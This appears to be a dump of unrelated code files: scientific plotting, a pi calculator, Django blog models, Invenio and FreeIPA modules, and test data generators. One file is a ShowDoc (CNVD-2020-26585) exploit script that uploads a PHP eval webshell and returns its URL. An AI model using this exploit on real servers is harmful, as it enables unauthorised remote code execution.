    plottingPath. NOTE: Python 2 source (print statements, itertools.izip,
    time.clock); reads per-run CSVs and chdirs per parameter combination.
    """
    # preparing the subplot
    fig, axes = plt.subplots(len(pC0E0Arr), len(pE0Arr), sharex= True, sharey= True)
    fig.set_size_inches(16, 16)
    fig.set_facecolor("white")
    ax_list = fig.axes
    # looping over the paramter space
    iX = 0
    for cueVal in pC0E0Arr: # for each cue validity
        jX = 0
        for pE0 in pE0Arr: # for each prior
            # set the working directory for the current parameter combination
            os.chdir(os.path.join(mainPath,"runTest_%s%s_%s_%s" % (argumentR[0], argumentP[0], pE0, cueVal)))
            ax = ax_list[iX*len(pE0Arr)+jX]
            # preparing data for the pies
            coordinates = []
            decisionsPies = []
            stateProbPies = []
            for t in tValues:
                # here is where the relevant files are loaded
                aggregatedResultsDF = pd.read_csv(os.path.join(dataPath, 'aggregatedResults_%s.csv' %t))
                # convert range to have a square canvas for plotting (required for the circle and a sensible aspect ratio of 1)
                aggregatedResultsDF['newpE1'] = convertValues(aggregatedResultsDF['pE1'], 1, 0, T - 1, 1)
                aggregatedResultsDF = aggregatedResultsDF[aggregatedResultsDF.stateProb >minProb] # minProb chance of reaching that state
                if t >= 1:
                    subDF = aggregatedResultsDF[aggregatedResultsDF['time'] ==t]
                    subDF = subDF.reset_index(drop=True)
                    pE1list = subDF['newpE1']
                    duplicateList = duplicates(pE1list)
                    if duplicateList:
                        # Same estimate reached by several states: remember them for pies.
                        stateProbs = list(subDF['stateProb'])
                        decisionMarker = list(subDF['marker'])
                        for key in duplicateList:
                            idxDuplList = duplicateList[key]
                            coordinates.append((t,key))
                            stateProbPies.append([stateProbs[i] for i in idxDuplList])
                            decisionsPies.append([decisionMarker[i] for i in idxDuplList])
            # One color per decision marker; -1 is the "no decision" grey.
            color_palette = {0:'#be0119', 1:'#448ee4', 2:'#000000', 3: '#98568d', 4: '#548d44', -1: '#d8dcd6'}
            colors = np.array([color_palette[idx] for idx in aggregatedResultsDF['marker']])
            area = area_calc(aggregatedResultsDF['stateProb'], r)
            # now plot the developmental trajectories
            circles(aggregatedResultsDF['time'],aggregatedResultsDF['newpE1'], s =area, ax = ax,c = colors, zorder = 2, lw = 0.5)
            del aggregatedResultsDF
            # plotting the lines
            if lines:
                startTime = time.clock()
                for t in np.arange(0,T-1,1):
                    print "Current time step: %s" % t
                    tNext = t+1
                    timeArr = [t, tNext]
                    if t == 0:
                        plottingDF = pd.read_csv(os.path.join(dataPath, 'plottingResults_%s.csv' % (t+1)))
                        plottingDF['newpE1'] = convertValues(plottingDF['pE1'], 1, 0, T - 1, 1)
                        subDF1 = plottingDF[plottingDF['time'] == t]
                        subDF1 = subDF1.reset_index(drop=True)
                        subDF2 = plottingDF[plottingDF['time'] == tNext]
                        subDF2 = subDF2.reset_index(drop=True)
                        aggregatedResultsDF = pd.read_csv(os.path.join(dataPath, 'aggregatedResults_%s.csv' % (tNext)))
                        aggregatedResultsDF = aggregatedResultsDF[aggregatedResultsDF.time ==1]
                        aggregatedResultsDF = aggregatedResultsDF.reset_index(drop = True)
                        indices = aggregatedResultsDF.index[aggregatedResultsDF.stateProb > minProb].tolist()
                        subDF2 = subDF2.iloc[indices]
                        subDF2 = subDF2.reset_index(drop=True)
                        del aggregatedResultsDF
                    else:
                        # Reuse the previous step's "next" frame as the new "current" one.
                        subDF1 = subDF2
                        del subDF2
                        aggregatedResultsDF = pd.read_csv(os.path.join(dataPath, 'aggregatedResults_%s.csv' % (tNext)))
                        aggregatedResultsDF.drop_duplicates(subset='pE1', inplace=True)
                        aggregatedResultsDF.reset_index(drop=True, inplace=True)
                        indices = aggregatedResultsDF.index[aggregatedResultsDF.stateProb <= minProb].tolist()
                        del aggregatedResultsDF
                        subDF2 = pd.read_csv(os.path.join(dataPath, 'plottingResults_%s.csv' %tNext))
                        subDF2['newpE1'] = convertValues(subDF2['pE1'], 1, 0, T - 1, 1)
                        subDF2.reset_index(drop=True, inplace= True)
                        subDF2.drop(index = indices, inplace= True)
                        subDF2.reset_index(drop=True, inplace=True)
                        del indices
                    subDF1['Identifier'] = cleanIdentifiers(subDF1.Identifier)
                    subDF2['Identifier'] = cleanIdentifiers(subDF2.Identifier)
                    nextIdentList = subDF2['Identifier']
                    yvalsIDXAll = []
                    if t <= 11: # otherwise the overhead for multiprocessing is slowing down the computation
                        for identSubDF1 in list(subDF1.Identifier):
                            subList = [isReachable(ident, nextIdentList) for ident in identSubDF1]
                            subList.sort()
                            subList2 = list(subList for subList, _ in itertools.groupby(subList))
                            yvalsIDXAll.append(subList2)
                            del subList
                            del subList2
                    else:
                        for identSubDF1 in list(subDF1.Identifier): # as many lines as unique cue validities
                            pool = multiprocessing.Pool(processes=32)
                            results = pool.map(func_star, itertools.izip(chunks(identSubDF1, 1000), itertools.repeat(nextIdentList)))
                            pool.close()
                            pool.join()
                            resultsUnchained = [item for sublist in results for item in sublist]
                            yvalsIDXAll.append(resultsUnchained)
                            del results
                            del resultsUnchained
                    # process the results
                    yArr = []
                    for subIDX in range(len(subDF1)):
                        yArr = [[subDF1['newpE1'].loc[subIDX], subDF2['newpE1'].loc[yIDX]] for yIDX in
                                itertools.chain.from_iterable(yvalsIDXAll[subIDX])]
                        [ax.plot(timeArr, yArrr, ls='solid', marker=" ", color='#e6daa6', zorder=1, lw=0.3) for yArrr in
                         yArr]
                    del yArr
                elapsedTime = time.clock()-startTime
                print "Elapsed time plotting the lines: " + str(elapsedTime)
            #
            # next step adding pies for cases where organisms with the same estimates make different decisions
            # this does not check whether the decisions are actually different; it does so implicitly
            xTuple = [current[0] for current in coordinates]
            yTuple = [current[1] for current in coordinates]
            radii = []
            for idx in range(len(coordinates)):
                colorsPies = [color_palette[idj] for idj in decisionsPies[idx]]
                pieFracs = [float(i)/sum(stateProbPies[idx]) for i in stateProbPies[idx]]
                currentR= np.sqrt(sum(stateProbPies[idx]))*r
                radii.append(currentR)
                pp,tt = ax.pie(pieFracs,colors = colorsPies, radius = currentR ,center = coordinates[idx], wedgeprops= {'linewidth':0.0, "edgecolor":"k"})
                [p.set_zorder(3+len(coordinates)-idx) for p in pp]
            # Axis cosmetics: hide the frame, keep ticks bottom/left only.
            ax.get_xaxis().tick_bottom()
            ax.get_yaxis().tick_left()
            ax.spines['top'].set_visible(False)
            ax.spines['right'].set_visible(False)
            ax.spines['bottom'].set_visible(False)
            ax.spines['left'].set_visible(False)
            plt.sca(ax)
            plt.grid(True, 'major', 'y', ls='--', lw=.5, c='k', alpha=.3)
            midPoint = (T)/float(2)
            yLabels = convertValues([1,midPoint,T-1], T-1,1,1,0)
            # removing frame around the plot
            plt.ylim(0.4, T-1+0.5)
            plt.xlim(-0.6,T-1+0.5)
            if iX == 0:
                plt.title(str(1-pE0), fontsize = 20)
            if iX == len(pC0E0Arr)-1:
                plt.xlabel('Time step', fontsize = 20, labelpad=10)
                plt.xticks(np.arange(2,T,2), fontsize = 12)
                plt.yticks([1, midPoint, T - 1], yLabels) #this doesn't make sense
            else:
                ax.get_xaxis().set_visible(False)
            if jX == 0:
                plt.yticks([1, midPoint, T - 1], yLabels,fontsize = 12)
                plt.ylabel('pE1', fontsize = 20, labelpad=10)
            if jX == len(pE0Arr) -1:
                plt.ylabel(str(cueVal), fontsize = 20,labelpad = 15, rotation = 'vertical')
                ax.yaxis.set_label_position("right")
            ax.set_aspect('equal')
            jX += 1
        iX += 1
    plt.suptitle('Prior probability', fontsize = 20)
    fig.text(0.98,0.5,'Cue reliability', fontsize = 20, horizontalalignment = 'right', verticalalignment = 'center', transform=ax.transAxes, rotation = 'vertical')
    resultPath = os.path.join(mainPath, plottingPath)
    plt.savefig(os.path.join(resultPath,'DevelopmentalTrajectoryReduced.png'), dpi = 400)
| StarcoderdataPython |
3582712 | <gh_stars>0
# somefile.py
def say_hello(name):
    """Print a 'Hello <name>' greeting to stdout."""
    greeting = "Hello"
    print(greeting, name)


if __name__ == '__main__':
    say_hello('Brian')
| StarcoderdataPython |
5166945 | # arctan = sum_n=0^inf (-1)^n x^(2n+1) / (2n + 1)
# pi = 16 arctan(1/5) - 4 arctan(1/239)
from fractions import Fraction
# Reference decimal expansion of pi ("3.14159...") used by get_ndigits below.
# NOTE(review): assumes pi.txt exists in the working directory — no fallback.
with open("pi.txt") as f:
    pi = f.read()
def compute_pi(n, m):
    """Approximate pi as an exact Fraction via Machin's formula.

    pi = 16*arctan(1/5) - 4*arctan(1/239), using *n* terms of the first
    arctan series and *m* terms of the second.
    """
    total = sum(
        16 * (-1) ** k * Fraction(1, (2 * k + 1) * 5 ** (2 * k + 1))
        for k in range(n)
    )
    total -= sum(
        4 * (-1) ** k * Fraction(1, (2 * k + 1) * 239 ** (2 * k + 1))
        for k in range(m)
    )
    return total
def get_decimal(n, places=10000):
    """Return the decimal expansion of *n* truncated to *places* digits, as a string."""
    integer_part = int(float(n) // 1)
    pieces = [f"{integer_part}."]
    n -= integer_part
    for _ in range(places):
        # Shift one decimal digit into the integer position and peel it off.
        n *= 10
        digit = int(float(n) // 1)
        pieces.append(f"{digit}")
        n -= digit
    return "".join(pieces)
def get_ndigits(approx):
    """Count how many leading decimal digits of *approx* match the reference pi.

    Returns -1 when *approx* does not start with "3.".
    NOTE(review): if every compared digit matches (no break), the loop ends
    with the last enumerate index, undercounting by one — confirm intent.
    """
    if not approx.startswith("3."):
        return -1
    # Compare digit-by-digit after the "3." prefix against the module-level
    # `pi` string read from pi.txt.
    for ndigits, (i, j) in enumerate(zip(pi[2:], approx[2:])):
        if i != j:
            break
    return ndigits
| StarcoderdataPython |
9782393 | from pylab import *;
import RungeKutta;
def dummy(t, f, args):
    """Zero tendency function for testing: an all-zeros array shaped like *f*."""
    target_shape = f.shape
    return zeros(target_shape)
def dummyVel(f, args):
    """Constant test velocity: always 1.3, regardless of the inputs."""
    speed = 1.3
    return speed
# Three 10x10 zero fields as the initial state for a smoke test of the stepper.
u = zeros((10,10));
v = zeros((10,10));
z = zeros((10,10));
delta = 0.1;
# RK4 stepper with zero tendencies and constant advection speed (see dummies above).
stepfwd = RungeKutta.RungeKutta4(delta, dummy, dummy, dummyVel);
tnew, fnew = stepfwd.integrate(0, [u,v,z],0.1);
print tnew;
| StarcoderdataPython |
1941415 | from django.db import models
from django.utils import timezone
# https://simpleisbetterthancomplex.com/tutorial/2016/07/22/how-to-extend-django-user-model.html#onetoone
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Slug
from django.db.models.signals import pre_save
from django.utils.text import slugify
# Markdown
from django.utils.safestring import mark_safe
from markdown_deux import markdown
# For getting absolute url
from django.core.urlresolvers import reverse
from django.http import HttpRequest
# Create your models here.
def upload_location(instance, filename):
    """Build the media upload path '<instance id>/<filename>'."""
    return "{}/{}".format(instance.id, filename)
class Profile(models.Model):
    """One-to-one extension of the Django User with extra profile data."""
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    # User data
    bio = models.TextField(blank=True)
    def get_markdown_bio(self):
        # Render the bio as Markdown and mark it safe for template output.
        bio = self.bio
        return mark_safe(markdown(bio))
class Post(models.Model):
    """Blog post with slug-based URLs, Markdown body and soft deletion."""
    # Link to another model
    author = models.ForeignKey('auth.User')
    # Defines title and gets url from title
    title = models.CharField(max_length=200)
    subtitle = models.CharField(max_length=750)
    slug = models.SlugField(unique=True)
    text = models.TextField()
    created_date = models.DateTimeField(
        default=timezone.now)
    published_date = models.DateTimeField(
        blank=True, null=True)
    # Populated by the ImageField below via width_field/height_field.
    height_field = models.IntegerField(default=0)
    width_field = models.IntegerField(default=0)
    image = models.ImageField(upload_to=upload_location,
                              null=True,
                              blank=True,
                              width_field="width_field",
                              height_field="height_field")
    # Soft-delete flag: delete() flips this instead of removing the row.
    is_active = models.BooleanField(default=True)
    def get_absolute_url(self):
        # Canonical URL resolved from the slug.
        return reverse("post_detail", kwargs={"slug": self.slug})
    def publish(self):
        # Stamp the publish time and (re-)activate the post.
        self.published_date = timezone.now()
        self.is_active = True
        self.save()
    def get_markdown_text(self):
        # Render the body as Markdown, marked safe for templates.
        return mark_safe(markdown(self.text))
    def set_text_to_markdown(self):
        # NOTE(review): self.plain_text is not a declared field on this model —
        # confirm where it is set before relying on this method.
        self.text = markdown(self.plain_text)
    def delete(self):
        # Soft delete: deactivate instead of removing the row.
        self.is_active = False
        self.save()
    def __str__(self):
        return self.title
class Comment(models.Model):
    """Comment on a Post, with optional parent for threaded replies and soft deletion."""
    post = models.ForeignKey('blog.Post', related_name='comments')
    # Reply to comments
    parent = models.ForeignKey("self", null=True, blank=True)
    author = models.CharField(max_length=200, default='anon')
    text = models.TextField()
    created_date = models.DateTimeField(default=timezone.now)
    approved_comment = models.BooleanField(default=False)
    # Soft-delete flag toggled by delete()/undelete().
    is_active = models.BooleanField(default=True)
    # Gets all the children/replies
    def children(self):
        return Comment.objects.filter(parent=self)
    # Checks if instance is a parent.
    @property
    def is_parent(self):
        # Top-level comments have no parent.
        if self.parent is not None:
            return False
        return True
    def approve(self):
        self.approved_comment = True
        self.save()
    def delete(self):
        # Soft delete: deactivate instead of removing the row.
        self.is_active = False
        self.save()
    def undelete(self):
        self.is_active = True
        self.save()
    def __str__(self):
        return self.text
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
    # Auto-create a Profile the first time a User row is saved.
    if created:
        Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
    # Keep the related Profile persisted whenever the User is saved.
    instance.profile.save()
# Recursive function that creates slug
def create_slug(instance, new_slug=None):
    """Derive a unique slug from the post title.

    On collision, appends the id of the newest conflicting post and recurses
    until a free slug is found.
    """
    slug = slugify(instance.title)
    if new_slug is not None:
        slug = new_slug
    query_set = Post.objects.filter(slug=slug).order_by("-id")
    exists = query_set.exists()
    if exists:
        new_slug = "%s-%s" % (slug, query_set.first().id)
        return create_slug(instance, new_slug=new_slug)
    return slug
def pre_save_post_receiver(sender, instance, *args, **kwargs):
    # Fill in a slug automatically before the first save.
    if not instance.slug:
        instance.slug = create_slug(instance)
pre_save.connect(pre_save_post_receiver, sender=Post)
| StarcoderdataPython |
8089208 | from unittest import TestCase
from trading_calendars.exchange_calendar_us_extended_hours import USExtendedHoursExchangeCalendar
from .test_trading_calendar import ExchangeCalendarTestBase
class USExtendedHoursCalendarTestCase(ExchangeCalendarTestBase, TestCase):
    """Exercise the US extended-hours exchange calendar against its answer key."""
    # CSV fixture name consumed by ExchangeCalendarTestBase.
    answer_key_filename = "us_extended_hours"
    calendar_class = USExtendedHoursExchangeCalendar
    # Extended-hours sessions may span up to 16 hours per day.
    MAX_SESSION_HOURS = 16
| StarcoderdataPython |
8130830 | <reponame>WingsSec/Meppo
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
from cgi import print_form
import requests
import re
from Config.config_requests import ua
# Suppress urllib3's certificate warnings (requests are made with verify=False).
requests.packages.urllib3.disable_warnings()
# Script information
######################################################
NAME = 'CNVD_2020_26585'
AUTHOR = "JDQ"
REMARK = 'ShowDoc前台文件上传getshell'
FOFA_RULE = 'app="ShowDoc" '
######################################################
# Fixed multipart boundary; must match the boundary used inside poc()'s payload.
headers = {'User-Agent': ua,
           'Content-Type': 'multipart/form-data; boundary=--------------------------921378126371623762173617'}
def poc(target):
    """Check CNVD-2020-26585 (ShowDoc unauthenticated file upload).

    Posts a crafted multipart body to the uploadImg endpoint and, on success,
    returns a dict with the uploaded webshell URL; returns None otherwise.
    """
    result = {}
    data = '''
----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?php @eval($_POST[a]);?>
----------------------------921378126371623762173617--'''
    try:
        r = requests.post(target+"/index.php?s=/home/page/uploadImg",
                          headers=headers, data=data, verify=False)
        if r.status_code == 200 and r.text:
            # Extract the returned URL of the uploaded file from the response body.
            resu = re.search(
                '.*"(http.*?.php)".*', r.text
            )
            shellurl = resu.group(1)
            result['target'] = target
            result['poc'] = NAME
            result['shell地址'] = shellurl.replace('\/', '/')
            result['shell密码'] = 'a'
            return result
    except:
        # NOTE(review): bare except silently swallows all errors (including
        # connection failures and the regex returning no match).
        pass
if __name__ == '__main__':
    poc("127.0.0.1")
| StarcoderdataPython |
5025211 | <gh_stars>0
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio module that adds userprofiles to the platform."""
from __future__ import absolute_import, print_function
from flask import Blueprint, current_app, flash, render_template, request
from flask_babelex import lazy_gettext as _
from flask_breadcrumbs import register_breadcrumb
from flask_login import current_user, login_required
from flask_menu import register_menu
from flask_security.confirmable import send_confirmation_instructions
from invenio_db import db
from invenio_theme.proxies import current_theme_icons
from speaklater import make_lazy_string
from .api import current_userprofile
from .forms import EmailProfileForm, ProfileForm, VerificationForm, \
confirm_register_form_factory, register_form_factory
from .models import UserProfile
# Blueprint serving the user-profile views and templates.
blueprint = Blueprint(
    'invenio_userprofiles',
    __name__,
    template_folder='templates',
)
# Blueprints used only to hook one-time app initialization (record_once below).
blueprint_api_init = Blueprint(
    'invenio_userprofiles_api_init',
    __name__,
    template_folder='templates',
)
blueprint_ui_init = Blueprint(
    'invenio_userprofiles_ui_init',
    __name__,
)
def init_common(app):
    """Post initialization."""
    # Optionally extend Flask-Security's registration forms with profile fields.
    if app.config['USERPROFILES_EXTEND_SECURITY_FORMS']:
        security_ext = app.extensions['security']
        security_ext.confirm_register_form = confirm_register_form_factory(
            security_ext.confirm_register_form)
        security_ext.register_form = register_form_factory(
            security_ext.register_form)
@blueprint_ui_init.record_once
def init_ui(state):
    """Post initialization for UI application."""
    app = state.app
    init_common(app)
    # Register blueprint for templates
    app.register_blueprint(
        blueprint, url_prefix=app.config['USERPROFILES_PROFILE_URL'])
@blueprint_api_init.record_once
def init_api(state):
    """Post initialization for API application."""
    init_common(state.app)
@blueprint.app_template_filter()
def userprofile(value):
    """Retrieve user profile for a given user id."""
    return UserProfile.get_by_userid(int(value))
@blueprint.route('/', methods=['GET', 'POST'])
@login_required
@register_menu(
    blueprint, 'settings.profile',
    # NOTE: Menu item text (icon replaced by a user icon).
    _('%(icon)s Profile', icon=make_lazy_string(
        lambda: f'<i class="{current_theme_icons.user}"></i>')),
    order=0
)
@register_breadcrumb(
    blueprint, 'breadcrumbs.settings.profile', _('Profile')
)
def profile():
    """View for editing a profile."""
    # Create forms
    verification_form = VerificationForm(formdata=None, prefix="verification")
    profile_form = profile_form_factory()
    # Process forms
    # Dispatch on the 'submit' field so both forms can share one endpoint.
    form = request.form.get('submit', None)
    if form == 'profile':
        handle_profile_form(profile_form)
    elif form == 'verification':
        handle_verification_form(verification_form)
    return render_template(
        current_app.config['USERPROFILES_PROFILE_TEMPLATE'],
        profile_form=profile_form,
        verification_form=verification_form,)
def profile_form_factory():
    """Create a profile form.

    Includes email fields only when USERPROFILES_EMAIL_ENABLED is set.
    """
    if current_app.config['USERPROFILES_EMAIL_ENABLED']:
        return EmailProfileForm(
            formdata=None,
            username=current_userprofile.username,
            full_name=current_userprofile.full_name,
            email=current_user.email,
            email_repeat=current_user.email,
            prefix='profile', )
    else:
        return ProfileForm(
            formdata=None,
            obj=current_userprofile,
            prefix='profile', )
def handle_verification_form(form):
    """Handle email sending verification form."""
    form.process(formdata=request.form)
    if form.validate_on_submit():
        send_confirmation_instructions(current_user)
        # NOTE: Flash message.
        flash(_("Verification email sent."), category="success")
def handle_profile_form(form):
    """Handle profile update form."""
    form.process(formdata=request.form)
    if form.validate_on_submit():
        email_changed = False
        # Nested transaction so profile and email updates commit atomically.
        with db.session.begin_nested():
            # Update profile.
            current_userprofile.username = form.username.data
            current_userprofile.full_name = form.full_name.data
            db.session.add(current_userprofile)
            # Update email
            if current_app.config['USERPROFILES_EMAIL_ENABLED'] and \
                    form.email.data != current_user.email:
                # A changed email must be re-confirmed.
                current_user.email = form.email.data
                current_user.confirmed_at = None
                db.session.add(current_user)
                email_changed = True
        db.session.commit()
        if email_changed:
            send_confirmation_instructions(current_user)
            # NOTE: Flash message after successful update of profile.
            flash(_('Profile was updated. We have sent a verification '
                    'email to %(email)s. Please check it.',
                    email=current_user.email),
                  category='success')
        else:
            # NOTE: Flash message after successful update of profile.
            flash(_('Profile was updated.'), category='success')
| StarcoderdataPython |
import functools
import warnings

import rasterio
def rasterio_decorator(func):
    """Decorator running *func* inside a rasterio driver context with warnings silenced.

    Fix: functools.wraps preserves the wrapped function's name, docstring and
    other metadata, which the original wrapper discarded.
    """
    @functools.wraps(func)
    def wrapped_f(*args, **kwargs):
        with warnings.catch_warnings():
            # Suppress GDAL/rasterio warnings for the duration of the call.
            warnings.simplefilter("ignore")
            with rasterio.drivers():
                return func(*args, **kwargs)
    return wrapped_f
| StarcoderdataPython |
3266164 | import torch
import torch.distributed as dist
def check_equal(A, B):
    """Assert that tensors A and B are element-wise close (rtol=1e-3, atol=1e-1).

    Fix: ``assert expr == True`` is redundant — assert the boolean directly.
    NOTE: assert statements are stripped under ``python -O``.
    """
    assert torch.allclose(A, B, rtol=1e-3, atol=1e-1)
def replace_parameter_add_grad(layer, weight=None, bias=None):
    """Swap in new weight/bias attributes on *layer* and mark them trainable.

    Attributes left as None are not touched.
    """
    for attr_name, new_value in (("weight", weight), ("bias", bias)):
        if new_value is None:
            continue
        # Remove the old attribute before attaching the replacement.
        delattr(layer, attr_name)
        setattr(layer, attr_name, new_value)
        getattr(layer, attr_name).requires_grad = True
def broadcast_tensor_chunk(tensor, chunk_size=1, local_rank=0):
    """Broadcast *tensor* from rank 0, then return this rank's chunk.

    Requires an initialized torch.distributed process group. The tensor is
    split along the last dimension into *chunk_size* pieces and the piece at
    *local_rank* is returned as an independent copy (clone).
    """
    dist.broadcast(tensor, src=0)
    tensor_chunk = torch.chunk(tensor, chunk_size, dim=-1)[local_rank]
    return tensor_chunk.clone()
1922702 | <reponame>livenson/waldur-freeipa
from . import tasks, utils
from .log import event_logger
def schedule_sync(*args, **kwargs):
    # Generic signal handler: arguments are ignored; just enqueue a FreeIPA sync.
    tasks.schedule_sync()
def schedule_sync_on_quota_change(sender, instance, created=False, **kwargs):
    # Only react to the FreeIPA quota; ignore other quota updates.
    if instance.name != utils.QUOTA_NAME:
        return
    # A freshly created quota with an unset (-1) limit needs no sync yet.
    if created and instance.limit == -1:
        return
    tasks.schedule_sync()
def log_profile_event(sender, instance, created=False, **kwargs):
    """Emit audit events for profile creation and is_active transitions."""
    profile = instance
    if created:
        event_logger.freeipa.info(
            '{username} FreeIPA profile has been created.',
            event_type='freeipa_profile_created',
            event_context={
                'user': profile.user,
                'username': profile.username,
            }
        )
    # tracker.previous tells us the pre-save value: True -> now disabled.
    elif profile.tracker.has_changed('is_active') and profile.tracker.previous('is_active'):
        event_logger.freeipa.info(
            '{username} FreeIPA profile has been disabled.',
            event_type='freeipa_profile_disabled',
            event_context={
                'user': profile.user,
                'username': profile.username,
            }
        )
    elif profile.tracker.has_changed('is_active') and not profile.tracker.previous('is_active'):
        event_logger.freeipa.info(
            '{username} FreeIPA profile has been enabled.',
            event_type='freeipa_profile_enabled',
            event_context={
                'user': profile.user,
                'username': profile.username,
            }
        )
def log_profile_deleted(sender, instance, **kwargs):
    """Emit an audit event when a profile row is deleted."""
    profile = instance
    event_logger.freeipa.info(
        '{username} FreeIPA profile has been deleted.',
        event_type='freeipa_profile_deleted',
        event_context={
            'user': profile.user,
            'username': profile.username,
        }
    )
| StarcoderdataPython |
1656590 | <reponame>rakesh-lagare/Thesis_Work
# -*- coding: utf-8 -*-
from random import randrange
import matplotlib.pyplot as plt
import numpy as np
import numpy.random as nprnd
import pandas as pd
import os
# Remove stale CSV outputs from a previous run; guard with exists() so a
# fresh checkout (where the files are absent) does not crash on startup
# with FileNotFoundError.
if os.path.exists("dataframe.csv"):
    os.remove("dataframe.csv")
if os.path.exists("dataList.csv"):
    os.remove("dataList.csv")
def pattern_gen(clas, noise, scale, offset):
    """Generate one synthetic spatial series for the requested pattern class.

    Parameters
    ----------
    clas : int
        Pattern class: 1 box, 2 linear increase, 3 linear decrease,
        4 periodic, 5/6 additional composite shapes.
    noise : int
        When 1, add uniform random noise (0-14, or -10..4 for class 4).
    scale : int
        When 1, multiply the pattern amplitude by a fixed factor
        (2.5 for classes 1-3, 3.5 for classes 4-6).
    offset : int
        Currently unused; kept for interface compatibility.

    Returns
    -------
    list
        The pattern padded on both sides with a fixed baseline segment.
    """
    ts_data = []
    # Fixed baseline segment prepended and appended around every pattern.
    tsn = [10, 10, 10, 10, 13, 10, 10, 10, 13, 10, 10, 10,
           10, 10, 10, 10, 13, 10, 10, 10, 13, 10, 10, 10]
    ts_noise = nprnd.randint(15, size=100)
    # (the unused ``ts_n0ise`` local from the original has been removed)

    # box
    if clas == 1:
        ts_data = [10,20,30,40,50,60,70,70,70,70,70,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,
                   80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,20,10]
        if scale == 1:
            ts_data = [i * 2.5 for i in ts_data]
        if noise == 1:
            ts_data = [sum(x) for x in zip(ts_data, ts_noise)]

    # linear increase (11..62)
    elif clas == 2:
        ts_data = list(range(11, 63))
        if scale == 1:
            ts_data = [i * 2.5 for i in ts_data]
        if noise == 1:
            ts_data = [sum(x) for x in zip(ts_data, ts_noise)]

    # linear decrease (62..11)
    elif clas == 3:
        ts_data = list(range(62, 10, -1))
        if scale == 1:
            ts_data = [i * 2.5 for i in ts_data]
        if noise == 1:
            ts_data = [sum(x) for x in zip(ts_data, ts_noise)]

    # periodic
    elif clas == 4:
        ts_data = [20,30,40,50,60,70,80,90,70,60,50,40,30,20,10,10,10,10,10,20,30,40,50,60,70,80,90,70,60,50,
                   40,30,20,10,10,10,10,10,20,30,40,50,60,70,80,90,70,60,50,40,30,20]
        if scale == 1:
            ts_data = [i * 3.5 for i in ts_data]
        if noise == 1:
            # noise shifted down by 10 for this class
            ts_data = [sum(x) for x in zip(ts_data, ts_noise - 10)]

    elif clas == 5:
        ts_data = [20,30,85,88,90,88,85,36,34,36,55,60,58,20,20,18,18,20,20,90,85,55,55,55,60,
                   10,20,30,85,88,90,88,85,36,34,36,55,60,58,20,20,18,18,20,20,90,85,55,55,55,60,10]
        if scale == 1:
            ts_data = [i * 3.5 for i in ts_data]
        if noise == 1:
            ts_data = [sum(x) for x in zip(ts_data, ts_noise)]

    elif clas == 6:
        ts_data = [10,20,30,90,90,90,90,90,90,90,90,90,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,
                   55,55,55,55,55,55,55,55,90,90,90,90,90,90,90,90,90,30,20,10]
        if scale == 1:
            ts_data = [i * 3.5 for i in ts_data]
        if noise == 1:
            ts_data = [sum(x) for x in zip(ts_data, ts_noise)]

    tss = tsn + ts_data + tsn
    return (tss)
def prep_data(num):
    """Build a labelled dataset of ``num`` randomly generated patterns.

    Returns
    -------
    df : pd.DataFrame
        One row per sample with columns ['index', 'class', 'noise', 'data'].
    data_list : list
        All generated series concatenated in order (also plotted as a
        side effect).
    """
    rows = []
    data_list = []
    for idx in range(num):
        random_clas = randrange(4) + 1
        random_noise = 1  # noise is always enabled
        random_scale = randrange(2)
        random_offset = 0  # offset is currently unused by pattern_gen
        # Encode the scale flag in the fractional part of the class label.
        clas = random_clas + (0.1 if random_scale == 0 else 0.2)
        ts_data = pattern_gen(random_clas, random_noise, random_scale, random_offset)
        rows.append(pd.DataFrame([[idx, clas, random_noise, ts_data]],
                                 columns=['index', 'class', 'noise', 'data']))
        data_list.extend(ts_data)
    # Bug fix: DataFrame.append was deprecated and removed in pandas 2.0;
    # collect the per-sample frames and concatenate once instead.
    df = pd.concat(rows) if rows else pd.DataFrame()
    plt.plot(data_list)
    plt.show()
    return (df, data_list)
# Generate the full dataset (10000 random samples) and persist it to disk.
df,data_list = prep_data(10000)
# NOTE(review): output paths are hard-coded absolute Windows paths — consider
# making these configurable before running on another machine.
export_csv = df.to_csv (r'C:\Megatron\Thesis\Thesis_Work\Sax\Final_code_test\dataframe.csv', index = None, header=True)
# Flatten the concatenated series into a single-column CSV.
temp_df = pd.DataFrame()
temp_df.insert(loc=0, column='sub_section', value=data_list)
export_csv1 = temp_df.to_csv (r'C:\Megatron\Thesis\Thesis_Work\Sax\Final_code_test\dataList.csv', index = None, header=True)
| StarcoderdataPython |
3412713 | <reponame>tiphaine/o2-base<gh_stars>0
import os

# Base directories for the raw and processed CAF datasets.
caf_raw = os.path.join('data', 'raw', 'caf')
caf_processed = os.path.join('data', 'processed', 'caf')

foyers_alloc_bas_revenus_prefix = 'http://data.caf.fr/dataset/79250fae-53f6-4d7c-91da-218e79bdcb60/resource/'

# Per-year resource path under the common prefix; 2016-2018 share a single
# consolidated resource.
_resource_by_year = {
    '2009': 'c51b0621-9b2a-4031-9859-553b06731ec3/download/BasrevenuCom2009.csv',
    '2010': '4a9e6c6d-0f36-4e1c-897a-e7801a0b35d0/download/BasrevenuCom2010.csv',
    '2011': '29796950-288c-4d25-b3d5-d365dd14a712/download/BasrevenuCom2011.csv',
    '2012': 'cbb003eb-46da-4ce2-98ad-e617dfef4e2b/download/BasrevenuCom2012.csv',
    '2013': 'c45d1b54-17be-4a80-89a0-5ec832e82599/download/BasrevenuCom2013.csv',
    '2014': 'a2e0ac46-d4ac-42cc-a28c-bd6b067004b0/download/BasrevenuCom2014.csv',
    '2015': '2f5e861c-0626-4e91-8745-0a5998b4aca7/download/BasrevenuCom2015.csv',
    '2016': '682daddd-82eb-4c9e-b105-4b06327dd5bb/download/BASREVENUCOM.csv',
